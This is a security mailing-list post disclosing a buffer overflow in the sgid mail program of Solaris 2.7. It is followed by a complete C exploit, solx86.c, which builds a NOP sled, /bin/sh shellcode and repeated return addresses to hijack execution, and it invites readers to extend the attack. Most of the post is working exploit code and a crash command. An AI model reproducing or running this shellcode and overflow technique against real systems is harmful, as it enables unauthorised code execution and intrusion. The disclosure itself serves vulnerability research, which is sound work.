Greetings,

There is a possible buffer overflow vulnerability in Solaris 2.7's sgid mail /usr/bin/mail. The reason it's only a possibility and not a full-blown exploit is that mail drops sgid privs before the overflow occurs. However, as we've seen in several past posts, this is not necessarily a bulletproof method of making one's program secure. Obviously mail needs these privs to perform some function, probably opening the appropriate mail-owned files to deliver mail. My guess would be that in the following usage, mail would need write (read?) access to foo's mail file.

bash-2.02$ mail -m `perl -e "print 'A' x 2106"` foo .
mail: ERROR signal 11
bash-2.02$

In any case, this overflow does allow execution of any command you wish as shown in the program at the end of this message. I would imagine that with some careful asm code, one would be able to exploit the specific vulnerability that may exist. Information on exactly what mail does with its s bit would be helpful.

Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com

--- solx86.c ---
/*
 * Generic Solaris x86 exploit program by Brock Tellier
 * Shellcode by Cheez Whiz
 * gcc -o mailex solx86.c
 * /usr/bin/mail -m `./mailex 0 1985 2285` foo . $
 * Usage: ./mailex
 *   (argv[1] = offset added to %esp for the return address,
 *    argv[2] = NOP sled length, argv[3] = total buffer length; see main())
 *
 * Demonstrative program for mail vulnerability. mail apparently drops privs
 * before the overflow occurs so we're not going to have a sgid mail shell.
 * Perhaps someone could make some 'shellcode' to exploit an open file
 * descriptor or something (whatever the reason mail is sgid mail).
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF 10000
#define NOP 0x90

/* Solaris x86 /bin/sh shellcode (Cheez Whiz) */
char shell[] =
    "\xeb\x3b\x9a\xff\xff\xff\xff\x07\xff"
    "\xc3\x5e\x31\xc0\x89\x46\xc1\x88\x46"
    "\xc6\x88\x46\x07\x89\x46\x0c\x31\xc0"
    "\x50\xb0\x17\xe8\xdf\xff\xff\xff\x83"
    "\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53"
    "\x8d\x1e\x89\x5e\x08\x53\xb0\x3b\xe8"
    "\xc8\xff\xff\xff\x83\xc4\x0c\xe8\xc8"
    "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
    "\x68\xff\xff\xff\xff\xff\xff\xff\xff"
    "\xff";

unsigned long int nop;      /* length of the NOP sled */
unsigned long int esp;      /* our stack pointer, used to guess the target's */
long int offset;            /* adjustment added to esp for the return address */
char buf[BUF];

/* Returns the current stack pointer (32-bit x86, gcc: value left in %eax) */
unsigned long int get_esp()
{
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    int buflen, i;

    if (argc > 1) offset = strtol(argv[1], NULL, 0);
    if (argc > 2) nop = strtoul(argv[2], NULL, 0); else nop = 285;
    if (argc > 3) buflen = atoi(argv[3]); else buflen = BUF;
    if (buflen > BUF || buflen < 0 || nop + strlen(shell) > (unsigned) buflen) {
        fprintf(stderr, "buffer length must hold the NOP sled plus shellcode\n");
        return 1;
    }
    esp = get_esp();

    /* NOP sled, then shellcode, then the guessed return address repeated
       up to the end of the buffer */
    memset(buf, NOP, buflen);
    memcpy(buf + nop, shell, strlen(shell));
    for (i = nop + strlen(shell); i < buflen - 4; i += 4)
        *((int *) &buf[i]) = esp + offset;

    /* emit the buffer; stop at the first NUL, as the shell would anyway */
    for (i = 0; i < buflen && buf[i]; i++)
        putchar(buf[i]);
    return 0;
}
---